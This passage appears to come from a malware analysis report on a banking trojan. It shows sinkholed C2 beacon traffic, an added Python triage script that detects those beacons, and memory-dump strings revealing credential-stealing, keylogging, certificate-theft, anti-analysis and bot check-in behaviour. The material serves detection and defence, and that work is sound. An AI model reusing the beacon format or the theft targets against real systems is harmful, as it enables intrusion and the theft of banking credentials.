Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mamawufo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:00 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mavagyte.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: qekenivo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xuxelixi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycukope.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zyrivuro.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mavagyte.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: viwemata.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:01 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycikoga.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: naselyfu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:57 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
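Every beacon above is the same GET /key.bin with a google.com Referer and a User-Agent that claims IE 2.0 on Windows NT 5.0 while carrying Trident/4.0 and .NET 3.5 tokens, which is what the two ET POLICY alerts key on. Most of the domains now answer from an Arbor Networks sinkhole (404 plus an X-Malware-Sinkhole header), while a few still return the 51-byte <!-- vbe --> page with a gvc cookie. The Python below is added here as an example and is not part of the report: it parses such exchanges, scores each one on those signals plus the 8-letter consonant/vowel .info hostname pattern shared by the domains in the URL list, and returns the hosts that are still live. The two exchanges are reconstructed from the traffic above; the '###' separator, the undefanged Referer and the classification thresholds are this example's own choices.

```python
"""Added example (not part of the Lavasoft report): triage key.bin beacons
from the Traffic section. Signals: fake User-Agent (what the ET POLICY alerts
fire on), beacon shape, sinkhole response, DGA-like hostname, live response."""
import re
from typing import Dict, List

# Constructed from two exchanges in the report; '###' separates exchanges.
SAMPLE_EXCHANGES = """\
GET /key.bin HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wycokolo.info

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: gvc=913vr2571033037526473; expires=Mon, 31-Oct-2022 17:35:03 GMT; path=/; domain=wycokolo.info; HttpOnly
Content-Length: 51
Content-Type: text/html; charset=UTF-8

<html><head></head><body><!-- vbe --></body></html>
###
GET /key.bin HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: dixoxywy.info

HTTP/1.1 404 Not Found
Server: nginx 1.1.19
X-Malware-Sinkhole: Arbor Networks
Connection: close
"""

UA_RE = re.compile(r"MSIE (\d+)\.\d+; Windows NT (\d+)\.(\d+)")
VOWELS = set("aeiouy")


def ua_is_fake(ua: str) -> bool:
    """The ET POLICY 'Unsupported/Fake' idea in miniature: IE older than 6 and
    NT 5.0 (Windows 2000) are long unsupported, and the Trident/ token only
    exists from IE 8 (which reports MSIE 7.0 in compatibility view)."""
    m = UA_RE.search(ua)
    if not m:
        return False
    msie, nt_major, nt_minor = (int(g) for g in m.groups())
    return msie < 6 or (nt_major, nt_minor) == (5, 0) or ("Trident/" in ua and msie < 7)


def looks_dga(host: str) -> bool:
    """8 lowercase letters alternating consonant/vowel under .info, the shape of
    every generated domain in the report's URL list (a pattern inferred from
    this sample, not a general DGA classifier)."""
    label, _, tld = host.partition(".")
    if tld != "info" or not re.fullmatch(r"[a-z]{8}", label):
        return False
    return all((c in VOWELS) != (label[i - 1] in VOWELS) for i, c in enumerate(label) if i)


def parse_message(block: str):
    """Split an HTTP request or response head into its first line and a header dict."""
    lines = block.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify(exchange: str) -> Dict[str, object]:
    request, _, response = exchange.strip().partition("\n\n")
    req_line, req_h = parse_message(request)
    resp_head, _, body = response.partition("\n\n")
    status_line, resp_h = parse_message(resp_head)
    host = req_h.get("host", "")
    return {
        "host": host,
        "beacon": req_line.startswith("GET /key.bin") and "google.com" in req_h.get("referer", ""),
        "fake_ua": ua_is_fake(req_h.get("user-agent", "")),
        "dga_like": looks_dga(host),
        "sinkholed": "x-malware-sinkhole" in resp_h,
        "live": status_line.split()[1] == "200" and "<!-- vbe -->" in body
                and resp_h.get("set-cookie", "").startswith("gvc="),
    }


def triage(capture: str) -> List[Dict[str, object]]:
    return [classify(x) for x in capture.split("###") if x.strip()]


def live_c2_hosts(capture: str) -> List[str]:
    """Hosts to block first: still answering the beacon and not sinkholed."""
    return [v["host"] for v in triage(capture) if v["live"] and not v["sinkholed"]]


if __name__ == "__main__":
    for verdict in triage(SAMPLE_EXCHANGES):
        print(verdict)
```

The User-Agent check alone reproduces the ET POLICY verdicts and needs no knowledge of the family; the hostname pattern and the gvc/<!-- vbe --> response are specific to this sample's infrastructure and will drift, so treat them as hunting pivots rather than durable signatures.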


The Trojan connects to the servers at the following location(s):

Strings from Dumps

winlogon.exe_416_rwx_00B40000_000AA000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

winlogon.exe_416_rwx_00CA0000_000B9000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
SYSTEM!WINUK0FFOO83I6!427963A6
C:\Windows\apppatch\xodaql.exe
C:\Windows\system32\config\systemprofile\AppData\Roaming\
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_580_rwx_00BB0000_00056000:


svchost.exe_580_rwx_00C10000_00065000:

MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff

svchost.exe_648_rwx_00200000_00056000:


svchost.exe_648_rwx_00A20000_00065000:

WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6
C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\

svchost.exe_700_rwx_01140000_00056000:

SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_700_rwx_01740000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
